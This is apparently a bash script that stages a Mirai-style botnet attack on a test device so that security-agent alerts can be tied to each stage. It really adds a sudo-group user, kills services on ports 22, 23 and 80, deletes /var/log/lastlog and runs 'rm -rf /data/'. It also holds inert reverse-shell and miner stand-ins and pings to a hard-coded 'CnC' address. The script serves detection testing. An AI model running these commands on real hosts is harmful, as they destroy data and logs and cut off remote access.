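#!/bin/bash
#
# Staged attack simulation, run on the device under test ("Running from
# within the attacked device"). Each stage prints a banner, runs one or two
# noisy commands and then waits for Enter, so the alerts raised by a host
# security agent can be matched to the stage that caused them.
#
# The "Expected alert" comments repeat the alert names given by the original
# author; confirm them against the monitoring product in use.
#
# Some steps really change the host: a new sudo-capable account, killed
# listeners on tcp/22, tcp/23 and tcp/80, removal of /var/log/lastlog and
# recursive removal of /data. Others are inert stand-ins that only fail or
# create empty files; they are marked "Inert" below.
#
# errexit is deliberately not enabled: the stand-ins are expected to fail and
# the walk-through has to continue past them.

readonly RULE="###################################################################"
readonly STARS="*******************************************************************"

#######################################
# Print a stage banner: rule, one line per argument, rule.
# Arguments: $@ - title lines, printed verbatim
# Outputs:   banner on stdout
#######################################
banner() {
  local title
  echo "${RULE}"
  for title in "$@"; do
    printf '%s\n' "${title}"
  done
  echo "${RULE}"
}

#######################################
# Block until the operator presses Enter, so each stage can be correlated
# with its alert before the next one starts.
#######################################
pause() {
  read -r -p "Press enter to continue attack"
}

#######################################
# Send SIGKILL to every PID in a whitespace-separated list.
# Does nothing when the list is empty, so kill is never called without
# arguments.
# Arguments: $1 - PID list as printed by `lsof -t` or `pgrep`
# Returns:   0 when the list is empty, otherwise kill's status
#######################################
force_kill() {
  local pid_list=$1
  if [[ -z "${pid_list}" ]]; then
    return 0
  fi
  # shellcheck disable=SC2086 -- one PID per word is intended
  kill -9 ${pid_list} 2> /dev/null
}

# --- Stage 1: local reconnaissance ---------------------------------------
# Expected alert: "Local host reconnaissance detected"
banner " Conducting Reconnaissance "
echo "Conducting analysis of host data..."
uname -a
echo "Got host data"
pause

# --- Stage 2: account creation and privilege change ----------------------
# Expected alert: "Detected suspicious use of the useradd command"
# The account is added to the sudo group; it is not given UID 0. The
# "privilege root" wording in the messages is the original author's.
# A randomly suffixed name is used and it is never removed by this script,
# so the account has to be cleaned up by hand after the exercise.
banner " Create User and Escalate Privilege "
new_user="privilegeduser${RANDOM}"
echo "Adding user named ${new_user} with privilege root to the system..."
useradd "${new_user}"
sudo usermod -aG sudo "${new_user}"
echo "Successfully added user named \"${new_user}\" with privilege root to the system"
pause

# --- Stage 3: kill the services holding 23, 22 and 80 --------------------
# Expected alerts: "Process running on multiple ports",
#                  "Process killing other processes"
# Real effect: whatever holds these ports (including an SSH session used to
# run this script) receives SIGKILL. Nothing is bound afterwards; the
# "Bound to" lines are log text only ("insert connect to port" was left as a
# placeholder by the author).
banner " Kill SSH, Telnet and HTTP to hijack ports 23, 22, 80 " \
  " Original logs from Mirai killer.c actor "

# port 23
echo "[killer] Trying to kill port 23"
echo "[killer] Finding and killing processes holding port 23"
force_kill "$(lsof -i:23 -t)"
echo "[killer] Killed tcp/23 (telnet)"
printf '%s\n\n' "[killer] Bound to tcp/23 (Telnet)"

# port 22
echo "[killer] Trying to kill port 22"
echo "[killer] Finding and killing processes holding port 22"
force_kill "$(lsof -i:22 -t)"
echo "[killer] Killed tcp/22 (SSH)"
printf '%s\n\n' "[killer] Bound to tcp/22 (SSH)"

# port 80
echo "[killer] Trying to kill port 80"
echo "[killer] Finding and killing processes holding port 80"
force_kill "$(lsof -i:80 -t)"
echo "[killer] Killed tcp/80 (http)"
printf '%s\n\n' "[killer] Bound to tcp/80 (http)"
pause

# --- Stage 4: kill "competing malware" -----------------------------------
# pgrep matches on the process name pattern "anime"; any unrelated process
# whose name matches is killed as well.
banner " Find and Kill Competing Malware "
echo "Looking for competing malware..."
force_kill "$(pgrep anime)"
echo "Killing .anime malware process..."
echo "[killer] Finished"
pause

# --- Stage 5: network sweep ----------------------------------------------
# Sends three ICMP echo requests to each of the 20 addresses .0 to .19 under
# the prefix below. No ports are probed and no logins are attempted.
banner " Scan The Network for More Volunrable Devices " \
  " Original logs from Mirai scanner.c actor "
echo "[scanner] Scanner process initialized. Scanning started..."
ip_prefix=13.92.249.
for ((i = 0; i < 20; i++)); do
  ip="${ip_prefix}${i}"
  echo "pinging ${ip}"
  ping -c3 "${ip}"
done
pause

# --- Stage 6: command-and-control contact --------------------------------
# Expected alerts: "Reverse shells", "Suspicious IP address communication",
#                  "Possible backdoor detected"
banner " Communicating with CnC for getting attack commands "
echo "Setting up a backdoor..."
# Inert: creates two empty files, "d-bus" and "notifier", in the working
# directory. NOTE(review): a single file name may have been intended.
touch d-bus notifier
echo "Backdoor set up"
echo "Opening reverse shell..."
# Inert: asks bash to run a script at the path /dev/tcp/, which is expected
# to fail because no such file exists; no socket is opened.
bash /dev/tcp/
echo "Reverse shell established"
echo "Communicating with CnC server..."
# The only network traffic in this stage: three ICMP echo requests, with the
# output left in pingtoCnC.txt in the working directory.
ping -c3 110.249.212.46 > pingtoCnC.txt
echo "Listening to CnC for future attack commands..."
pause

# --- Stage 7: covering tracks --------------------------------------------
# Expected alerts: "Removal of system logs files detected",
#                  "Potential overriding of common files"
banner " Covering Tracks - Deleting Logs and Executables"
echo "Removing system logs..."
# Real effect: the last-login database is deleted.
rm /var/log/lastlog
echo "Removed system logs"
echo "Overriding linux system files..."
# Inert: copies netstat to a file named "a" in the working directory; no
# system binary is replaced.
cp /bin/netstat a
echo "Overrode linux system files"
echo "Deleting history files..."
# Clears only this shell's in-memory history list; no history file on disk
# is modified.
history -c
echo "Deleted history files"
pause

echo "${STARS}"
echo "${STARS}"
echo " Mirai Botnet Expansion Scenarios "
echo "${STARS}"
echo "${STARS}"
pause

# --- Scenario: crypto coin miner -----------------------------------------
# Inert: the URL is not an owner/repository path, so the clone is expected
# to fail; nothing is built or executed.
banner " Mirai Variant - Mining Crypto Currency Using the Botnet "
echo "Setting up crypto miner..."
git clone https://github.com/cpuminer
echo "Mining crypto with device resources"
pause

# --- Scenario: data egress ("fish tank") ---------------------------------
# Expected alert: "Possible loss of data detected"
# Despite the "Sending data" messages, nothing leaves the host: the command
# below deletes /data recursively and cannot be undone.
banner " Fish Tank Scenario - Egress Data Through IoT Device "
echo "Sending data collected through the device..."
rm -rf /data/
echo "Sent data"
pause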